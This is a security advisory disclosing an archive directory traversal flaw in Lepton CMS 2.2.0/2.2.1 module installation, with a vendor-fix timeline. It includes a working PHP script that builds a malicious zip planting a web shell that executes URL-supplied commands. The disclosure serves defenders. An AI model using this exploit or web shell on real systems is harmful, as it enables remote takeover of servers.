Lepton CMS versions 2.2.0 and 2.2.1 suffer from a directory traversal vulnerability.
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[+] Credits: John Page (HYP3RLINX)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/LEPTON-ARCHIVE-DIRECTORY-TRAVERSAL.txt
[+] ISR: ApparitionSec
Vendor:
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www.lepton-cms.org
Product:
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Lepton CMS 2.2.0 / 2.2.1 (update)
LEPTON is an easy-to-use but full customizable Content Management System
(CMS).
Vulnerability Type:
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Archive Directory Traversal
CVE Reference:
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N/A
Vulnerability Details:
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Lepton has feature that lets users install new modules, if malicious user
uploads an archive and the module is not valid it
will generate an error. However, the malicious archive will still get
decompressed and no check is made for ../ characters in
the file name allowing in arbitrary PHP files to be placed outside the
intended target directory for installed modules. This can
then be used to execute remote commands on the affected host system.
e.g.
We get error message as below.
under "Add Ons" tab Install Module.
Invalid LEPTON installation file. Please check the *.zip format.[1]
Archive still gets decompressed and the malicious file is moved outside of
the intended target directory, by using ../ in file name.
Exploit code(s):
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<?php
#Archive Directory Traversal to RCE exploit
#==============================================
if($argc<2){echo "Usage: <filename>";exit();}
$file_name=$argv[1];
$zip = new ZipArchive();
$res = $zip->open("$file_name.zip", ZipArchive::CREATE);
$zip->addFromString("..\..\..\..\..\..\..\..\RCE.php", '<?php
exec($_GET["cmd"]); ?>');
$zip->close();
echo "Malicious archive created...\r\n";
echo "========= hyp3rlinx ============";
?>
Disclosure Timeline:
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Attempted Vendor Notification: June 11, 2016 (No replies)
Vendor Notification on July 12, 2016 ( thanks Henri Salo )
Vendor Acknowledgement: July 13, 2016
Vendor fixes: July 14, 2016
Vendor release version 2.2.2 : August 12, 2016
August 15, 2016 : Public Disclosure
Exploitation Technique:
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Local
Severity Level:
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High
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